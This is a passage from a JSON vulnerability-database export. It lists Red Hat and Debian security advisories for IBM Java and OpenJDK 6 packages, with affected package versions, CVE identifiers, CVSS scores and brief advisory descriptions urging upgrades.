"packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "ppc64", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "ppc64", "packageName": "java-1.6.0-ibm-javacomm", "packageFilename": "java-1.6.0-ibm-javacomm-1.6.0.10.0-1jpp.2.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "ppc64", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "s390x", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "s390x", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "s390", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "s390x", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "s390x", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "s390x", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el6.s390x.rpm", "operator": "lt"}], "description": "The IBM Java SE version 6 release includes the IBM Java 6 Runtime\nEnvironment and the IBM Java 6 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 6 Runtime\nEnvironment and the IBM Java 6 Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM \"Security alerts\" page,\nlisted in the References section. (CVE-2011-3389, CVE-2011-3516,\nCVE-2011-3521, CVE-2011-3544, CVE-2011-3545, CVE-2011-3546, CVE-2011-3547,\nCVE-2011-3548, CVE-2011-3549, CVE-2011-3550, CVE-2011-3551, CVE-2011-3552,\nCVE-2011-3553, CVE-2011-3554, CVE-2011-3556, CVE-2011-3557, CVE-2011-3560,\nCVE-2011-3561)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java 6 SR10 release. All running instances\nof IBM Java must be restarted for the update to take effect.\n", "reporter": "RedHat", "published": "2012-01-18T05:00:00", "type": "redhat", "title": "(RHSA-2012:0034) Critical: java-1.6.0-ibm security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-3516", "CVE-2011-3521", "CVE-2011-3544", "CVE-2011-3545", "CVE-2011-3546", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3549", "CVE-2011-3550", "CVE-2011-3551", "CVE-2011-3552", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3560", "CVE-2011-3561"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T09:04:11", "id": "RHSA-2012:0034", "href": "https://access.redhat.com/errata/RHSA-2012:0034", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-13T00:00:27", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "i386", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "i386", "packageName": "java-1.5.0-ibm-accessibility", "packageFilename": "java-1.5.0-ibm-accessibility-1.5.0.13.0-1jpp.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "i386", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "i386", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "i386", "packageName": "java-1.5.0-ibm-javacomm", "packageFilename": "java-1.5.0-ibm-javacomm-1.5.0.13.0-1jpp.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "i386", "packageName": "java-1.5.0-ibm-jdbc", "packageFilename": "java-1.5.0-ibm-jdbc-1.5.0.13.0-1jpp.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "i386", "packageName": "java-1.5.0-ibm-plugin", "packageFilename": "java-1.5.0-ibm-plugin-1.5.0.13.0-1jpp.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "i386", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.5.0-ibm-accessibility", "packageFilename": "java-1.5.0-ibm-accessibility-1.5.0.13.0-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.5.0-ibm-javacomm", "packageFilename": "java-1.5.0-ibm-javacomm-1.5.0.13.0-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc", "packageName": "java-1.5.0-ibm-accessibility", "packageFilename": "java-1.5.0-ibm-accessibility-1.5.0.13.0-1jpp.1.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc", "packageName": "java-1.5.0-ibm-javacomm", "packageFilename": "java-1.5.0-ibm-javacomm-1.5.0.13.0-1jpp.1.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc", "packageName": "java-1.5.0-ibm-jdbc", "packageFilename": "java-1.5.0-ibm-jdbc-1.5.0.13.0-1jpp.1.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc", "packageName": "java-1.5.0-ibm-plugin", "packageFilename": "java-1.5.0-ibm-plugin-1.5.0.13.0-1jpp.1.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc64", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc64", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc64", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc64", "packageName": "java-1.5.0-ibm-javacomm", "packageFilename": "java-1.5.0-ibm-javacomm-1.5.0.13.0-1jpp.1.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "ppc64", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390", "packageName": "java-1.5.0-ibm-jdbc", "packageFilename": "java-1.5.0-ibm-jdbc-1.5.0.13.0-1jpp.1.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390x", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390x", "packageName": "java-1.5.0-ibm-accessibility", "packageFilename": "java-1.5.0-ibm-accessibility-1.5.0.13.0-1jpp.1.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390x", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390x", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.5.0.13.0-1jpp.1.el5", "arch": "s390x", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "i686", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.5.0-ibm-javacomm", "packageFilename": "java-1.5.0-ibm-javacomm-1.5.0.13.0-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "i686", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "i686", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "i686", "packageName": "java-1.5.0-ibm-javacomm", "packageFilename": "java-1.5.0-ibm-javacomm-1.5.0.13.0-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "i686", "packageName": "java-1.5.0-ibm-jdbc", "packageFilename": "java-1.5.0-ibm-jdbc-1.5.0.13.0-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "i686", "packageName": "java-1.5.0-ibm-plugin", "packageFilename": "java-1.5.0-ibm-plugin-1.5.0.13.0-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "i686", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "ppc", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "ppc", "packageName": "java-1.5.0-ibm-jdbc", "packageFilename": "java-1.5.0-ibm-jdbc-1.5.0.13.0-1jpp.1.el6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "ppc", "packageName": "java-1.5.0-ibm-plugin", "packageFilename": "java-1.5.0-ibm-plugin-1.5.0.13.0-1jpp.1.el6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "ppc64", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "ppc64", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "ppc64", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "ppc64", "packageName": "java-1.5.0-ibm-javacomm", "packageFilename": "java-1.5.0-ibm-javacomm-1.5.0.13.0-1jpp.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "ppc64", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "s390", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "s390", "packageName": "java-1.5.0-ibm-jdbc", "packageFilename": "java-1.5.0-ibm-jdbc-1.5.0.13.0-1jpp.1.el6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "s390x", "packageName": "java-1.5.0-ibm", "packageFilename": "java-1.5.0-ibm-1.5.0.13.0-1jpp.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "s390x", "packageName": "java-1.5.0-ibm-demo", "packageFilename": "java-1.5.0-ibm-demo-1.5.0.13.0-1jpp.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "s390x", "packageName": "java-1.5.0-ibm-devel", "packageFilename": "java-1.5.0-ibm-devel-1.5.0.13.0-1jpp.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.5.0.13.0-1jpp.1.el6", "arch": "s390x", "packageName": "java-1.5.0-ibm-src", "packageFilename": "java-1.5.0-ibm-src-1.5.0.13.0-1jpp.1.el6.s390x.rpm", "operator": "lt"}], "description": "The IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM \"Security alerts\" page,\nlisted in the References section. (CVE-2011-3545, CVE-2011-3547,\nCVE-2011-3548, CVE-2011-3549, CVE-2011-3552, CVE-2011-3554, CVE-2011-3556)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR13 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.\n", "reporter": "RedHat", "published": "2011-11-24T05:00:00", "type": "redhat", "title": "(RHSA-2011:1478) Critical: java-1.5.0-ibm security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3545", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3549", "CVE-2011-3552", "CVE-2011-3554", "CVE-2011-3556"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T09:04:33", "id": "RHSA-2011:1478", "href": "https://access.redhat.com/errata/RHSA-2011:1478", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:25", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6-jre-zero_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6-jre-zero", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6-source_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6-source", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6-jdk_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6-jdk", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6-jre-lib_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6-jre-headless_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "icedtea6-plugin_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "icedtea6-plugin", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6-doc_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6-doc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6-demo_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6-demo", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "icedtea-6-jre-cacao_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "icedtea-6-jre-cacao", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6-dbg_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "6b18-1.8.10-0+squeeze2", "arch": "all", "packageFilename": "openjdk-6-jre_6b18-1.8.10-0+squeeze2_all.deb", "packageName": "openjdk-6-jre", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2356-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nDecember 01, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openjdk-6\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-3389 CVE-2011-3521 CVE-2011-3544 CVE-2011-3547 CVE-2011-3548 CVE-2011-3551 CVE-2011-3552 CVE-2011-3553 CVE-2011-3554 CVE-2011-3556 CVE-2011-3557 CVE-2011-3560\n\nSeveral vulnerabilities have been discovered in OpenJDK, an\nimplementation of the Java platform:\n\nCVE-2011-3389\n\tThe TLS implementation does not guard properly against certain\n\tchosen-plaintext attacks when block ciphers are used in CBC\n\tmode.\n\nCVE-2011-3521\n\tThe CORBA implementation contains a deserialization\n\tvulnerability in the IIOP implementation, allowing untrusted\n\tJava code (such as applets) to elevate its privileges.\n\nCVE-2011-3544\n\tThe Java scripting engine lacks necessary security manager\n\tchecks, allowing untrusted Java code (such as applets) to\n\televate its privileges.\n\nCVE-2011-3547\n\tThe skip() method in java.io.InputStream uses a shared buffer,\n\tallowing untrusted Java code (such as applets) to access data\n\tthat is skipped by other code.\n\nCVE-2011-3548\n\tThe java.awt.AWTKeyStroke class contains a flaw which allows\n\tuntrusted Java code (such as applets) to elevate its\n\tprivileges.\n\nCVE-2011-3551\n\tThe Java2D C code contains an integer overflow which results\n\tin a heap-based buffer overflow, potentially allowing\n\tuntrusted Java code (such as applets) to elevate its\n\tprivileges.\n\nCVE-2011-3552\n\tMalicous Java code can use up an excessive amount of UDP\n\tports, leading to a denial of service.\n\nCVE-2011-3553\n\tJAX-WS enables stack traces for certain server responses by\n\tdefault, potentially leaking sensitive information.\n\nCVE-2011-3554\n\tJAR files in pack200 format are not properly checked for\n\terrors, potentially leading to arbitrary code execution when\n\tunpacking crafted pack200 files.\n\nCVE-2011-3556\n\tThe RMI Registry server lacks access restrictions on certain\n\tmethods, allowing a remote client to execute arbitary code.\n\nCVE-2011-3557\n\tThe RMI Registry server fails to properly restrict privileges\n\tof untrusted Java code, allowing RMI clients to elevate their\n\tprivileges on the RMI Registry server.\n\nCVE-2011-3560\n\tThe com.sun.net.ssl.HttpsURLConnection class does not perform\n\tproper security manager checks in the setSSLSocketFactory()\n\tmethod, allowing untrusted Java code to bypass security policy\n\trestrictions.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 6b18-1.8.10-0+squeeze1.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem has been fixed in version 6b23~pre11-1.\n\nWe recommend that you upgrade your openjdk-6 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "reporter": "Debian", "published": "2011-12-01T20:33:49", "title": "[SECURITY] [DSA 2356-1] openjdk-6 security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:25", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2011-12-01T20:33:49", "id": "DEBIAN:DSA-2356-1:91E00", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00234.html", "cvss": 